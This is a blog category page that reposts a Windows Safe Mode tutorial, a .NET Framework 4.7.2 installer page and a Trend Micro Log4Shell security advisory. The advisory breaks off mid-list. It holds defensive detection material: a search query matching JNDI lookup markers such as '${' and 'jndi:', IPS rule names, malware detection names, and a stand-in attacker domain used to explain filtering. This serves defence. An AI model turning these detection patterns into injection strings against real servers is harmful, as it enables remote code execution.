Category: Windows 10

Category for Windows 10 posts

How to start Microsoft Windows in Safe Mode

Introduction

Windows Safe Mode is a way of booting up your Windows operating system in order to run administrative and diagnostic tasks on your installation. When you boot into Safe Mode the operating system only loads the bare minimum of software that is required for the operating system to work. This mode of operating is designed to let you troubleshoot and run diagnostics on your computer. Windows Safe Mode loads a basic video drivers so your programs may look different than normal.

For Win98/ME, XP, Vista and Windows 7 there are two methods of booting into Safe Mode, while 95 and 2000 only have one. We will describe these methods below:

F8 – By pressing the F8 key right when Windows starts, usually right after you hear your computer beep when you reboot it, you will be brought to a menu where you can choose to boot into safe mode. If it does not work on the first try, reboot and try again as you have to be quick when you press it. I have found that during boot up right after the computer shows you all the equipment , memory, etc installed on your computer, if you start lightly tapping the F8 key you will usually be able to get to the desired menu.

System Configuration Utility – You can use the System Configuration Utility, or MSCONFIG, found in Windows 98, ME, XP, Windows Vista, and Windows 7 to make Windows boot into Safe Mode on the next reboot. We will go into specific details in the sections below. Please note, that you should not force your computer to boot into Safe Mode using the System Configuration Utility if you suspect you are infected with malware as the malware may corrupt keys required to boot into Safe Mode. You can read more about this here.

Windows 95

Windows 95 can only boot into Safe Mode using the F8 method as it does not have a System Configuration Utility.

Using the F8 Method:

  1. Restart your computer.
  2. When the machine first starts it will generally list some equipment that is installed in your machine, amount of memory, hard drives installed etc. When it is finished with that it will say “Starting Windows 95”. Immediately after seeing “Starting Windows 95” press the F8 key.
  3. You will now be presented with a menu. Select the option for Safe Mode using the arrow keys.
  4. Then press enter on your keyboard to boot into Safe Mode.
  5. Do whatever tasks you require and when you are done reboot to boot back into normal mode.

Windows 98/ME

NOTE: Windows ME may look slightly different than what is shown in the images below. You should still have no problem following along.

Using the F8 Method:

  1. Restart your computer.
  2. When the machine first starts again it will generally list some equipment that is installed in your machine, amount of memory, hard drives installed etc. At this point you should gently tap the F8 key repeatedly until you are presented with a menu.
  3. When you have the menu on the screen. Select the option for Safe Mode using the arrow keys.
  4. Then press enter on your keyboard to boot into Safe Mode.
  5. Do whatever tasks you require and when you are done reboot to boot back into normal mode.

Using the System Configuration Tool Method:

Step 1: Close all programs so that you have nothing open and are at the desktop.

Step 2: Click on the Start button then click on Run.

Step 3: In the Run field type msconfig as shown in the image below.


Figure 1. Starting Msconfig

Step 4: Press the OK button and the System Configuration Utility will start up. You will then see a screen similar to Figure 2 below.


Figure 2. SCU Startup Screen

Step 5: You should now press the Advanced button designated by the red box in the figure above and you will see a screen similar to figure 3 below.


Figure 3. Advanced Options

Step 6: Place a check mark in the checkbox labeled “Enable Startup Menu” designated by the red box in Figure 3 above. Then press the OK button and then the OK button again. Windows 98/ME will now prompt if you would like to reboot as shown in Figure 4 below.


Figure 4. Confirm Reboot

Step 7: Press the Yes button and your computer will restart into Safe Mode.

Step 8: When the computer boots up perform what diagnostic or troubleshooting tasks you require.

Step 9. When you are finished with these tasks, complete steps 1-7 again, but in Step 6 this time uncheck the checkbox labeled “Enable Startup Menu”.

Step 10: Reboot the computer back into normal mode.

Windows 2000

Windows 2000 can only boot into Safe Mode using the F8 method as it does not have a System Configuration Utility.

Using the F8 Method:

  1. Restart your computer.
  2. When the machine first starts again it will generally list some equipment that is installed in your machine, amount of memory, hard drives installed etc. When that is completed it will start loading Windows.
  3. When you see the screen that has a black and white bar at the bottom stating “Starting Windows”, tap the F8 key repeatedly until you get to the Windows 2000 Advanced Options Menu
  4. At this menu use the arrow keys to select the Safe Mode option, which is usually the first in the list.
  5. Press the enter key.
  6. Your computer will continue booting, but now will boot into Safe Mode.
  7. Do whatever tasks you require and when you are done reboot to boot back into normal mode.

Windows XP

Using the F8 Method:

  1. Restart your computer.
  2. When the machine first starts again it will generally list some equipment that is installed in your machine, amount of memory, hard drives installed etc. At this point you should gently tap the F8 key repeatedly until you are presented with a Windows XP Advanced Options menu.
  3. Select the option for Safe Mode using the arrow keys.
  4. Then press enter on your keyboard to boot into Safe Mode.
  5. Do whatever tasks you require and when you are done reboot to boot back into normal mode.

Using the System Configuration Tool Method:

Note: If you are having trouble entering Safe Mode via the F8 method, you should not use this method to force it to startup into safe mode. For reasons why, you should read this.

Step 1: Close all programs so that you have nothing open and are at the desktop.

Step 2: Click on the Start button then click on Run.

Step 3: In the Run field type msconfig as shown in the image below.


Figure 4. Starting Msconfig

Step 4: Press the OK button and the System Configuration Utility will start up. You will then see a screen similar to Figure 5 below.


Figure 5. Starting the System Configuration Utility

Step 5: Click on the tab labeled “BOOT.INI” which is designated by the red box in Figure 5 above. You will then be presented with a screen similar to Figure 6 below.


Figure 6. BOOT.INI Tab

Step 6: Put a check mark in the checkbox labeled “/SAFEBOOT” designated by the red box in Figure 6 above. Then press the OK button. After pressing the button you will be presented with a confirmation box as shown in Figure 7 below.


Figure 7. Confirm Reboot

Step 7: Press the Restart button and let the computer reboot. It will now boot up into Safe Mode.

Step 8: When the computer boots up do what diagnostic or troubleshooting tasks that you need to do.

Step 9. When are finished with your tasks, complete steps 1-7 again, but in Step 6 this time uncheck the checkbox labeled “/SAFEBOOT”. Then click on the General tab and set it for Normal startup.

Step 10: Reboot the computer back into normal mode.

Windows Vista

Using the F8 Method:

  1. Restart your computer.
  2. When the computer starts you will see your computer’s hardware being listed. When you see this information start to gently tap the F8 key repeatedly until you are presented with the Windows Vista Advanced Boot Options.
  3. Select the Safe Mode option using the arrow keys.
  4. Then press the enter key on your keyboard to boot into Vista Safe Mode.
  5. When Windows starts you will be at a typical logon screen. Logon to your computer and Vista will enter Safe mode.
  6. Do whatever tasks you require, and when you are done, reboot to go back into normal mode.

Using the System Configuration Tool Method:

Note: If you are having trouble entering Safe Mode via the F8 method, you should not use this method to force it to startup into safe mode. For reasons why, you should read this.

  1. Close any running programs and open Windows so you are back at the desktop.
     
  2. Click on the Start () button.
     
  3. In the Start Menu Search Box () type msconfig and press enter on your keyboard.
     
  4. The System Configuration utility will open and you will see a screen similar to the one below.


     Vista System Configuration Utility
    Figure 8. Vista System Configuration Utility


    Click on the Boot tab.
  5. You will now be at the Boot options screen as shown below.


     Vista Boot tab in the System Configuration utility
    Figure 9. Vista Boot tab in the System Configuration utility


    Put a check mark in the checkbox labeled Safe boot
     
  6. Press the Apply button and then press the OK button.
     
  7. You will now be presented with a prompt stating that you need to reboot the computer to apply the change.


     Restart Prompt
    Figure 10. Restart Prompt


    Click on the Restart button to reboot your computer.
     
  8. Your computer will now restart directly into Safe Mode. When you get to the Vista logon screen, log on to the computer and perform any necessary tasks.
     
  9. When done with your tasks, from within Safe Mode, start msconfig.
     
  10. When the program is open, and you are on the General tab, select the option labeled Normal Startup.
     
  11. Then press the Apply button and then the OK button.
     
  12. When the programs prompts you to reboot, allow it to do so, and you will boot back into Windows Vista in normal mode.

Windows 7

Using the F8 Method:

  1. Restart your computer.
  2. When the computer starts you will see your computer’s hardware being listed. When you see this information start to gently tap the F8 key on your keyboard repeatedly until you are presented with the Windows 7 Advanced Boot Options screen as shown in the image below.

     Figure 11. Windows 7 Advanced Boot Options screen
    Figure 11. Windows 7 Advanced Boot Options screen
  3. Using the arrow keys, select the Safe Mode option you want.
  4. Then press the enter key on your keyboard to boot into Windows 7 Safe Mode.
  5. When Windows starts you will be at a typical logon screen. Logon to your computer and Windows 7 will enter Safe mode.
  6. Do whatever tasks you require, and when you are done, reboot to go back into normal mode.

Using the System Configuration Tool Method:

Note: If you are having trouble entering Safe Mode via the F8 method, you should not use this method to force it to startup into safe mode. For reasons why, you should read this.

  1. Close any running programs and open Windows so you are back at the desktop.
     
  2. Click on the Start () button.
     
  3. In the Start Menu Search Box type msconfig as shown in Figure 12 below.

     Figure 12. Windows 7 Search box
    Figure 12. Windows 7 Search box

    Then press enter on your keyboard.
     
  4. The System Configuration utility will open and you will see a screen similar to the one below.


     Vista System Configuration Utility
    Figure 13. Windows 7 System Configuration Utility


    Click on the Boot tab.
     
  5. You will now be at the Boot screen as shown below.


     Vista Boot tab in the System Configuration utility
    Figure 14. Windows 7 Boot tab in the System Configuration utility


    Put a check mark in the checkbox labeled Safe boot
     
  6. Press the Apply button and then press the OK button.
     
  7. You will now be presented with a prompt stating that you need to reboot the computer to apply the change.


     Figure 15. Restart Prompt
    Figure 15. Restart Prompt


    Click on the Restart button to reboot your computer.
     
  8. Your computer will now restart directly into Safe Mode. When you get to the Windows 7 logon screen, log on to the computer and perform any necessary tasks.
     
  9. When done with your tasks, from within Safe Mode, start msconfig.
     
  10. When the program is open, and you are on the General tab, select the option labeled Normal Startup.
     
  11. Then press the Apply button and then the OK button.
     
  12. When the programs prompts you to reboot, allow it to do so, and you will boot back into Windows 7 in normal mode.

Windows 8

For a detailed tutorial on how to boot Windows 8 into Safe Mode, please see this tutorial: How to start Windows 8 in Safe Mode

Using the Advanced startup options method:

  1. From the Windows Start screen, type Advanced startup and when the search results appear, click on the Settings category and then click on the Advanced startup options search option.
     
  2. When the Settings screen opens, scroll down and click on the Restart now button under the Advanced Startup category and your computer will restart.
     
  3. When the Advance startup menu appears, click on the Troubleshoot option.
     
  4. Then click on the Advanced Options button.
     
  5. Finally click on the Startup Settings option and then click on the Restart button. Your computer will now restart again.
     
  6. When you get to the Startup Settings screen, press the number for the Safe Mode option you wish to use.
     
  7. Do whatever tasks you require, and when you are done, reboot to go back into normal mode.


Using the System Configuration Tool Method:

Note: If you are having trouble entering Safe Mode via the Advanced Startup menu, you should not use this method to force it to startup into safe mode. For reasons why, you should read this.

  1. Go to the Windows Start screen and type msconfig. When the msconfig search results appears, click on it.
     
     
  2. The System Configuration utility will open and you will see a screen similar to the one below.


     Vista System Configuration Utility
    Click on the Boot tab.
     
  3. You will now be at the Boot screen as shown below.


     Vista Boot tab in the System Configuration utility


    Put a check mark in the checkbox labeled Safe boot
     
  4. Press the Apply button and then press the OK button.
     
  5. You will now be presented with a prompt stating that you need to reboot the computer to apply the change.


     Figure 15. Restart Prompt


    Click on the Restart button to reboot your computer.
     
  6. Your computer will now restart directly into Safe Mode. When you get to the Windows 8 logon screen, log on to the computer and perform any necessary tasks.
     
  7. When done with your tasks, from within Safe Mode, go back to the Start screen by pressing the Tab key on your keyboard. Then start msconfig again by typing msconfig and then clicking on its search result.
     
  8. When the program is open, and you are on the General tab, select the option labeled Normal Startup.
     
  9. Then press the Apply button and then the OK button.
     
  10. When the programs prompts you to reboot, allow it to do so, and you will boot back into Windows 8 in normal mode.

Windows 10

For a detailed tutorial on how to boot Windows 10 into Safe Mode, please see this tutorial: How to Start Windows 10 in Safe Mode with Networking

  1. Press the Ctrl+Alt+Delete keys a the same time to enter the Windows security screen.
     
  2. While holding down the Shift key, click on the Power button (Windows 10 Power Button) and then click on Restart.
     
  3. When Windows 10 restarts, you will be at the Choose an Option screen as shown below. At this screen, click on the Troubleshoot button to access the Troubleshoot options.
     
  4. At the Troubleshoot screen, click on the Advanced Options button to open the advanced options screen.
     
  5. At the Advanced Options screen, click on the Startup Settings option. This will open the Startup Settings screen.
     
  6. At the Startup Settings screen, click on the Restart button. Windows will now restart.
     
  7. After restarting you will be shown a Startup Settings screen. At this screen you should press the number 5 key on your keyboard to enter Safe Mode with Networking.
     
  8. Your computer will now reboot. Once rebooted, you will be at a login prompt. Login to access Safe mode with Networking.

Problems that can occur by forcing Safe Mode using the System Configuration Utility

It is possible to make your computer continuously boot up into safe mode using the System Configuration utility as described above. The program does this by changing your boot.ini file, the settings file that configures your computer’s boot sequence, and adding the /safeboot argument to your operating systems startup line. An example of this can be seen below.

Original[operating systems]
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS=”Microsoft Windows XP Professional” /FASTDETECT /NOEXECUTE=OPTIN
After using MsConfig.exe[operating systems]
multi(0)disk(0)rdisk(0)partition(2)\WINDOWS=”Microsoft Windows XP Professional” /FASTDETECT /NOEXECUTE=OPTIN /safeboot:minimal

When you are done using safe mode, you would then run the System Configuration utility again and uncheck the /Safeboot option, thus removing the /safeboot argument from the boot.ini file, and allowing your computer to boot up normally.

On a computer that is operating properly this is normally not a problem. Unfortunately, though, a new trick that some of the more recent malware are using is to delete certain Windows Registry keys so that your computer can not properly boot into safe mode. It is in these situations that using the System Configuration utility to boot into safe mode can cause the computer to become inoperable for many users.

This is because once you set the computer to boot into Safe Mode using /Safeboot, it will continuously attempt to start Safe Mode until the /safeboot argument is removed from the boot.ini. Since the malware is not allowing us to actually boot into safe mode, you have no way of getting to a point where you can run the System Configuration utility again to uncheck the /Safeboot option. Thus, you are stuck with a computer constantly attempting to get into safe mode and not being able to do so.

If a situation like this has happened to you it is possible to fix this problem by renaming your boot.ini file. The first step would be to use a boot disk to start your computer. If your computer does not have a floppy disk, then you can typically boot off the Windows CD that came with your computer in order to access the Windows Recovery Console. More information about the Windows Recovery Console can be found here. Once booted to a command prompt, you would simply rename your C:\Boot.ini file to another name like C:\Boot.ini.bak. The command to rename the file at the command prompt is:

ren C:\Boot.ini Boot.ini.bak

Once the file is renamed, you can then remove the boot disk and reboot your computer to get back to normal mode. When booting up after the rename, do not be surprised if you see an error stating that you do not have a valid Boot.ini file. When you get back to normal Windows mode, you can then rename C:\Boot.ini.bak to C:\Boot.ini and run Msconfig again to remove the /safeboot flag.

Conclusion

It is not uncommon when people are helping you troubleshoot your computer that they tell you to enter Safe Mode. With this tutorial you should now know how to enter Safe Mode when it is required.

If you have any questions please feel free to post them in our tech support forums.

Source :
https://www.bleepingcomputer.com/tutorials/how-to-start-windows-in-safe-mode/

Microsoft .NET Framework 4.7.2 offline installer for Windows

About Microsoft .NET Framework 4.7.2

Microsoft .NET Framework 4.7.2 is a highly compatible, in-place update to .NET Framework 4, 4.5, 4.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, and 4.7.1.

  • The offline package can be used in situations in which the web installer cannot be used because of a lack of Internet connectivity. This package is larger than the web installer and does not include the language packs. We recommend that you use the web installer instead of the offline installer for optimal efficiency and bandwidth requirements.
  • When you install this package, the following packages or updates are installed per your operating system:
    • In Windows 7 Service Pack 1 (SP1) and Windows Server 2008 R2 SP1, .NET Framework 4.7.2 is listed as an installed product under the Programs and Features item in Control Panel.
    • In Windows Server 2012, Update for Microsoft Windows (KB4054542) is listed under the Installed Updates item in Control Panel.
    • In Windows 8.1 or Windows Server 2012 R2, Update for Microsoft Windows (KB4054566) is displayed under the Installed Updates item in Control Panel.
    • In Windows 10 Anniversary Update (version 1607), Windows 10 Creators Update (version 1703) and Windows Server 2016, Update for Microsoft Windows (KB4054590) is listed under the Installed Updates item in Control Panel.
    • In Windows 10 Fall Creators Update (version 1709), Update for Microsoft Windows (KB4073120) is listed under the Installed Updates item in Control Panel.

Microsoft .NET Framework 4.7.2 is available on Windows Update and on Windows Server Update Service (WSUS). It will be offered as a recommended update on Windows Update.

Note The package installer (NDP472-KB4054530-x86-x64-AllOS-ENU.exe) was updated on July 10, 2018. If you downloaded the installer before July 10, 2018, we recommend that you download the latest version (4.7.3081.0) of the installer to get the additional fixes included in the update.

Download information

The following files are available for download from the Microsoft Download Center:

For information about how to download Microsoft support files, see How to obtain Microsoft support files from online services.

Virus-scan claim

Issues that are fixed in this update

The following issues are fixed for .NET Framework 4.7.2.

SQL Server (SQL)

  • Fixes an issue in which the .NET Framework API SqlConnection.ConnectionString property is used to set a null or empty connection string. In this situation, a Null Reference Exception (NRE) occurs when you use the API together with .NET Framework 4.7.2. [611802, System.Data.dll, Bug]
  • Fixes an issue in which you connect to Azure SQL DB and MultipleActiveResultSets=true is used in the connection string together with System.Data.SqlClient.SqlConnection. In this situation, the async query operations cause a bad TDS protocol request stream to be sent from the client. This causes the Async Query APIs to fail. [620109, System.Data.dll , Bug]

Windows Presentation Framework (WPF)

  • Adds an AppContext switch that opts out of some work that was done during AppDomain or process shutdown. This issue can reduce (but not eliminate) the possibility of a crash in applications that make unwarranted assumptions about the timing of the finalizer thread. [593963, WindowsBase.dll, Bug]
  • Fixes a crash in WPF that occurs when you multiple characters are replaced by a single character (in a different language than the original text) by using IMEPad. [605996, PresentationFramework.dll, Bug]
  • Combo box grouped items now report children correctly through UIAutomation. [605922, PresentationFramework.dll, Bug]

More information

This version of .NET Framework runs side-by-side with .NET Framework 3.5 SP1 and earlier versions. However, it performs an in-place update for .NET Framework 4, 4.5, 4.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, and 4.7.1.

Known issues

  • Applications that rely on .NET Framework to initialize a COM component and that run with restricted permissions may fail to start or run correctly, and return “access denied,” “class not registered,” or “internal failure occurred for unknown reasons” errors.
  • For known issues with .NET Framework 4.7.2 see Known issues for .NET Framework 4.7.2.

Command-line switches for this update

For more information about the various command-line options that are supported by this update, see the “Command-Line options” section in .NET Framework Deployment Guide for Developers.

Restart requirement

You may have to restart the computer after you install this update. We recommend that you exit all applications that are using .NET Framework before you install this update.

Supported operating systems

Microsoft .NET Framework 4.7.2 (Offline Installer) supports the following operating systems:

  • Windows Server 2016 (version 1709)
  • Windows 10 Anniversary Update (version 1607) (x86 and x64)
  • Windows 10 Creators Update (version 1703) (x86 and x64)
  • Windows 10 Fall Creators Update (version 1709) (x86 and x64)
  • Windows Server 2012 R2 (x64)
  • Windows 8.1 (x86 and x64)
  • Windows Server 2012 (x64)
  • Windows Server 2008 R2 Service Pack 1 (x64)
  • Windows 7 Service Pack 1 (x86 and x64)

    Source :
    https://support.microsoft.com/en-us/topic/microsoft-net-framework-4-7-2-offline-installer-for-windows-05a72734-2127-a15d-50cf-daf56d5faec2

SECURITY ALERT: Apache Log4j “Log4Shell” Remote Code Execution 0-Day Vulnerability (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105)

SUMMARY

Updated on 12/29/2021 @ 2:00PM GMT with updated information about Trend Micro Log4Shell Vulnerability Assessment Tool and new CVE-2021-44832.

Jump directly to information on affected/not-affected Trend Micro Products

On December 9, 2021, a new critical 0-day vulnerability impacting multiple versions of the popular Apache Log4j 2  logging library was publicly disclosed that, if exploited, could result in  Remote Code Execution (RCE) by logging a certain string on affected installations.  

This specific vulnerability has been assigned CVE-2021-44228 and is also being commonly referred to as “Log4Shell” in various blogs and reports.  Versions of the library said to be affected are versions 2.0-beta 9 to 2.14.1.https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/.

On December 14, 2021, information about a related vulnerability CVE-2021-45046 was released that recommended that users upgrade to at least version 2.16.0+ of Log4j 2.

Based on our analysis, the rules and protections listed below for CVE-2021-44228 are also effective against CVE-2021-45046.

On December 18, 2021, information about a potential “3rd wave” and version 2.17.0 has been released and assigned CVE-2021-45105.  Information about protection is below and ZDI has a technical blog about it here:  https://www.zerodayinitiative.com/blog/2021/12/17/cve-2021-45105-denial-of-service-via-uncontrolled-recursion-in-log4j-strsubstitutor . 

On December 28th, yet another RCE (CVE-2021-44832) was discovered and disclosed.  Although not as critical as the initial vulnerabilities (CVSS 6.6), it is still recommended that administrators do their due diligence to update to the latest version available (2.17.1).

Background

Log4j is an open-open source, Java-based logging utility that is widely deployed and used across a variety of enterprise applications, including many cloud services that utilize Apache web servers.  

The vulnerability (assigned as CVE-2021-44228) is a Java Naming and Directory InterfaceTM (JNDI) injection vulnerability in the affected versions of Log4j listed above.  It can be triggered when a system using an affected version of Log4j 2 includes untrusted data in the logged message – which if this data includes a crafted malicious payload, a JNDI lookup is made to a malicious server.  Depending on the information sent back (response) a malicious Java object may be loaded, which could eventually lead to RCE.  In addition, attackers who can control log messages or their parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. 

The challenge with this vulnerability is widespread use of this particular logging utility in many enterprise and cloud applications.  JDNI lookups support multiple protocols, but based on analysis so far, exploitability depends on the Java versions and configurations.  From a practical standpoint, just because a server has implemented an affected version of Log4j 2, it does not automatically mean it is vulnerable depending on its configuration.

Trend Micro Research is continuing to analyze this vulnerability and its exploits and will update this article as more information becomes available.  A comprehensive blog with more background information can be found here .DETAILS

Protection Against Exploitation

First and foremost, it is always highly recommended that users apply the vendor’s patches when they become available.

A new version of Log4j 2 has been released which reportedly resolves the issue:  Version 2.17.1 is now availableand is the suggested update.   Users with affected installations should consider updating this library at the earliest possible time.

Note:  due to additional waves of new exploits, the previous manual mitigation steps published have proven not to be sufficient and have been removed.

Trend Micro Protection and Investigation

In addition to the vendor patch(s) that should be applied, Trend Micro has released some supplementary rules, filters and detection protection that may help provide additional protection and detection of malicious components associated with this attack servers that have not already been compromised or against further attempted attacks.

The following demo video highlights ways in which Trend Micro can help customers discover, detect and provide protection:  https://www.youtube.com/watch?v=r_IggE3te6s.

Using Trend Micro Products for Investigation

Trend Micro Log4j Vulnerability ScannerTrend Micro Research has created a quick web-based scanning tool that can help users and administrators identify server applications that may be affected but the Log4Shell vulnerability.The tool can be found at: https://log4j-tester.trendmicro.com/ and a demo video can be found at: https://youtu.be/7uix6nDoLBs.

Trend Micro Log4Shell Vulnerability Assessment ToolTrend Micro also has created a free assessment tool that can quickly identify endpoints and server applications that may have Log4j using the power of Trend Micro Vision One.This quick and easy self-serve security assessment tool leverages complimentary access to the Trend Micro Vision One threat defense platform, so you can identify endpoints and server applications that may be affected by Log4Shell. The assessment instantly provides a detailed view of your attack surface and shares next steps to mitigate risks.

The free assessment tool can be found at: https://resources.trendmicro.com/Log4Shell-Vulnerability-Assessment.html .

Please note, if you are already a Trend Micro Vision One customer, you do not need to complete the form. Simply log into your console and you will be provided instructions to complete the assessment of your exposure.

Trend Micro Vision One™

Trend Micro Vision One customers benefit from XDR detection capabilities of the underlying products such as Apex One. In addition, depending on their data collection time range, Trend Micro Vision One customers may be able to sweep for IOCs retrospectively to identify if there was potential activity in this range to help in investigation.

Vision One Threat Intelligence Sweeping

Indicators for exploits associated with this vulnerability are now included in the Threat Intelligence Sweeping function of Trend Micro Vision One. Customers who have this enabled will now have the presence of the IOCs related to these threats added to their daily telemetry scans.  

The first sweep, “Vulnerable version of log4j….” is slightly different than the others in that instead of specific IOCs, it is looking for specific instances of log4j libraries on systems which can help a customer narrow down or give additional insights on potentially vulnerable systems.

The results of the intelligence scans will populate in the WorkBench section of Vision One (as well as the sweep history of each unfolded threat intelligence report).

image.png

Please note that customers may also manually initiate a scan at any time by clicking the 3 dots at the right of a rule and selecting the “Start Sweeping” option.

Vision One Search Queries for Deep Security Deep Packet Inspection

Customers who have Trend Micro Cloud One – Workload Security or Deep Security may utilize the following search query to identify hosts and then additional queries can be made with a narrowed timeframe on those hosts as additional information is learned about exploits.

eventName:DEEP_PACKET_INSPECTION_EVENT AND (ruleId:1008610 OR ruleId:1011242 OR ruleId:1005177) AND ("${" AND ("lower:" OR "upper:" OR "sys:" OR "env:" OR "java:" OR "jndi:"))

image

Trend Micro Cloud One™ – Conformity

Trend Micro Cloud One – Conformity allows gives customers central visibility and real-time monitoring of their cloud infrastructure by enabling administrators to auto-check against nearly 1000 cloud service configuration best practices across 90+ services and avoid cloud service misconfigurations. 

The following rules are available to all Trend Micro Cloud One – Conformity customers that may help provide more insight to customers looking to isolate affected machines (more information can be found here for rule configuration):

  • Lambda-001 :  identifies all Lambdas that are running Java which may be vulnerable.

Graphical user interface, text, application, email Description automatically generated

Graphical user interface, text, application, email Description automatically generated

Preventative Rules, Filters & Detection

A demo video of how Trend Micro Cloud One can help with this vulnerability can be found at: https://youtu.be/CorEsXv3Trc.

Trend Micro Cloud One – Workload Security and Deep Security IPS Rules

  • Rule 1011242 – Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

This rule is recommended by default, and please note that the port lists may need to be updated for applications running on non-default ports.

  • Rule 1005177 – Restrict Java Bytecode File (Jar/Class) Download
  • Rule 1008610 – Block Object-Graph Navigation Language (OGNL) Expressions Initiation In Apache Struts HTTP Request

Rule 1008610 is a SMART rule that can be manually assigned to assist in protection/detection against suspicious activity that may be associated with this threat.  This is not a comprehensive replacement for the vendor’s patch.
 
Please also note that rule 1008610 is shipped in DETECT, and must be manually changed to PREVENT if the administrator wishes to apply this.  Also, please be aware that due to the nature of this rule, there may be False Positives in certain environments, so environment-specific testing is recommended. 

  • Rule 1011249 – Apache Log4j Denial of Service Vulnerability (protects against CVE-2021-45105)

Trend Micro Cloud One – Workload Security and Deep Security Log Inspection

  • LI Rule 1011241 – Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
  • A custom LI rule can also be created to detect patterns as discovered in the future.  More information can be found here.

Trend Micro Apex One Integrated Vulnerability Protection (iVP) Rules

  • Rule 1011242 – Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
  • Rule 1011249 – Apache Log4j Denial of Service Vulnerability (protects against CVE-2021-45105)

Trend Micro Deep Discovery Inspector (DDI) Rules

  • Rule 4280:  HTTP_POSSIBLE_USERAGENT_RCE_EXPLOIT_REQUEST
  • Rule 4641 : CVE-2021-44228 – OGNL EXPLOIT – HTTP(REQUEST)
  • Rule 4642 : POSSIBLE HTTP HEADER OGNL EXPRESSION EXPLOIT – HTTP(REQUEST)
  • Rule 4643:  POSSIBLE HTTP BODY OGNL EXPRESSION EXPLOIT – HTTP (REQUEST) – Variant 2

Trend Micro Cloud One – Network Security and TippingPoint Recommended Actions

  • Filter 40627 : HTTP: JNDI Injection in HTTP Header or URI

This was released in Digital Vaccine #9621 and has replaced CSW C1000001 that was previously released.

Trend Micro recommends customers enable this filter in a block and notify posture for optimal coverage. Starting with Digital Vaccines released on 12/21/2021, it will be enabled by default. Since it may not be enabled in your environment, Trend Micro strongly recommends you confirm the filter is enabled in your policy.  

  • Filter 40652: HTTP: Apache Log4j StrSubstitutor Denial-of-Service Vulnerability (ZDI-21-1541)
    • Covers CVE-2021-45105


What other controls can be used to disrupt the attack?

This attack is successful when the exploit is used to initiate a transfer of a malicious attack payload.  In addition to the filter above, these techniques can help disrupt that chain:

  • Geolocation filtering can be used to reduce possible attack vectors. Geolocation filtering can block inbound and outbound connections to any specified country, which may limit the ability for attackers to exploit the environment. In cases where a business only operates in certain regions of the globe, proactively blocking other countries may be advisable.
  • For TippingPoint IPS, TPS, and vTPS products
    Trend Micro also recommends enabling DNS and URL reputation as a proactive means of securing an environment from this vulnerability. Leveraging Trend Micro’s rapidly evolving threat intelligence, TippingPoint appliances can help disrupt the chain of attack destined to known malicious hosts.

    Additionally, Reputation filtering can be leveraged to block Anonymous proxies that are commonly used in exploit attempts. Any inbound or outbound connections to/from an anonymous proxy or anonymizer service can be blocked by configuring a reputation filter with “Reputation DV Exploit Type” set to “Tor Exit” to a Block action.
  • For Cloud One – Network Security
    Anonymous proxies are also an independent, configurable “region” that can be selected as part of Geolocation filtering. This will block any inbound or outbound connection to/from an anonymous proxy or anonymizer service, which can be commonly used as part of exploit attempts.

    Domain filtering can also be used to limit the attack vectors and disrupt the attack chain used to exploit this vulnerability. In this case, any outbound connection over TCP is dropped unless the domain being accessed is on a permit list. If the attacker’s domain, e.g. http://attacker.com, is not on the permit list, then it would be blocked by default, regardless of IPS filter policy.



Trend Micro Malware Detection Patterns (VSAPI, Predictive Learning, Behavioral Monitoring and WRS) for Endpoint, Servers, Mail & Gateway (e.g. Apex One, Worry-Free Business Security Services, Worry-Free Business Security Standard/Advanced, Deep Security w/Anti-malware, etc.)

  • Web Reputation (WRS):  Trend Micro has added over 1700 URLs (and growing) to its WRS database to block that are linked to malicious reporting and communication vectors associated with observed exploits against this vulnerability.
  • Ransomware Detection – there have been observations about a major ransomware campaign (Khonsari) being utilized in attacks and Trend Micro detects components related to this as Ransom.MSIL.KHONSARI.YXBLN.
  • VSAPI (Pattern) Detections:  the following detections have been released in the latest OPR for malicious code associated with exploits –
    • Trojan.Linux.MIRAI.SEMR
    • HS_MIRAI.SMF
    • HS_MIRAI.SME
    • Trojan.SH.CVE20207961.SM
    • Backdoor.Linux.MIRAI.SEMR
    • Trojan.SH.MIRAI.MKF
    • Coinminer.Linux.KINSING.D
    • Trojan.FRS.VSNTLB21
    • Trojan.SH.MALXMR.UWELI
    • Backdoor.SH.KIRABASH.YXBLL
    • Backdoor.Linux.MIRAI.SMMR1
    • Coinminer.SH.MALXMR.UWEKG
    • Coinminer.Linux.MALXMR.SMDSL64
    • Backdoor.Linux.GAFGYT.SMMR3
    • Coinminer.Win64.MALXMR.TIAOODGY
    • Rootkit.Linux.PROCHID.B
    • ELF_SETAG.SM
    • Backdoor.Linux.TSUNAMI.AMZ
    • Coinminer.PS1.MALXMR.PFAIQ
    • Trojan.SH.TSUNAMI.A
    • Trojan.PS1.METERPRETER.E
    • Coinminer.Linux.MALXRMR.PUWENN

Trend Micro Cloud One – Application Security

Trend Micro Cloud One – Application Security can monitor a running application and stop unexpected shell commands from executing.   The product’s RCE configuration can be adjusted to help protect against certain exploits associated with this vulnerability using the following steps:

  1. Log into Trend Micro Cloud One and navigate to Application Security.
  2. Select “Group;s Policy” in the left-hand menu and find your application’s Group.
  3. Enable “Remote Command Execution” if not already enabled.
  4. Click the hamburger icon for “Configure Policy” and then click the ” < INSERT RULE > ” icon.
  5. Input (?s).* in the “Enter a pattern to match” field and hit “Submit” and “Save Changes.”
  6. Double-check that “Mitigate” is selected in your “Remote Command Execution” line item.

Trend Micro Cloud One – Open Source Security by Snyk

Trend Micro Cloud One – Open Source Security by Snyk can identify vulnerable versions of the log4j library across all organization source code repositories with very little integration effort.  Once installed, it can also monitor progress on updating to non-vulnerable versions.




TXOne Preventative Rules for Edge Series Products

Several rules for the TXOne Edge Series of products can be found here: https://www.txone-networks.com/blog/content/critical-log4shell-vulnerability .


Trend Micro is continuing to actively research the potential exploits and behavior around this vulnerability and is actively looking for malicious code that may be associated with any exploit attempts against the vulnerability and will be adding additional detection and/or protection as they become available.

Impact on Trend Micro Products

Trend Micro is currently doing a product/service-wide assessment to see if any products or services may be affected by this vulnerability.  Products will be added to the lists below as they are validated.

Products Confirmed Not Affected (Including SaaS Solutions that have been patched):

 

5G Mobile Network SecurityNot Affected
